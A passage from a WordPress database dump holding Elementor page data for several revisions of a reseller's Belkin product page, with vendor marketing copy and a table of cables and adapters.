src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Micro HDMI Adapter<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6653,3264,'_elementor_version','2.5.14'),(8686,3654,'_wp_desired_post_slug','dell'),(8687,3669,'_edit_lock','1572483127:1'),(6656,3265,'_wp_page_template','template-fullwidth.php'),(6657,3265,'_elementor_edit_mode','builder'),(6658,3265,'_elementor_template_type','post'),(6659,3265,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2><h4>\\u00a0<\\/h4><h3>Innovation, with quality at its core<\\/h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p><h3>Global leader in tech.<\\/h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p><h3>Always looking to the future<\\/h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p><h3>An unwavering commitment to earning your trust.<\\/h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p><h3>Unmatched performance, every time<\\/h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p><h3>We believe good design matters.<\\/h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p><h4>Product : -<\\/h4><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/><\\/p><p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Micro HDMI Adapter<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6660,3265,'_elementor_version','2.5.14'),(8684,3654,'_wp_trash_meta_status','publish'),(8685,3654,'_wp_trash_meta_time','1571992281'),(6663,3266,'_wp_page_template','template-fullwidth.php'),(6664,3266,'_elementor_edit_mode','builder'),(6665,3266,'_elementor_template_type','post'),(6666,3266,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2><h4>\\u00a0<\\/h4><h3>Innovation, with quality at its core<\\/h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p><h3>Global leader in tech.<\\/h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p><h3>Always looking to the future<\\/h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p><h3>An unwavering commitment to earning your trust.<\\/h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p><h3>Unmatched performance, every time<\\/h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p><h3>We believe good design matters.<\\/h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p><h3>Product\\u00a0 : -<\\/h3><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/><\\/p><p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Micro HDMI Adapter<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6667,3266,'_elementor_version','2.5.14'),(6672,3267,'_elementor_template_type','post'),(6673,3267,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4><\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\\n<h3>Global leader in tech.<\\/h3>\\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\\n<h3>Always looking to the future<\\/h3>\\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.\\n<h3>Unmatched performance, every time<\\/h3>\\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\\n<h3>We believe good design matters.<\\/h3>\\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\\n\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\\n<h3>Product\\u00a0 : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/>\\n\\n<strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong>\\n\\n<center> [maxbutton id=\\\"9\\\" ] <\\/center>\\n\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Mini DisplayPortTM to VGA<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Micro HDMI Adapter<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Lightning Audio + Charge RockStar\\u2122<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6674,3267,'_elementor_version','2.5.14'),(6686,3269,'_elementor_template_type','post'),(6687,3269,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4><\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\\n<h3>Global leader in tech.<\\/h3>\\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\\n<h3>Always looking to the future<\\/h3>\\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.\\n<h3>Unmatched performance, every time<\\/h3>\\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\\n<h3>We believe good design matters.<\\/h3>\\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\\n\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\\n<h3>Product\\u00a0 : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/>\\n\\n<strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img 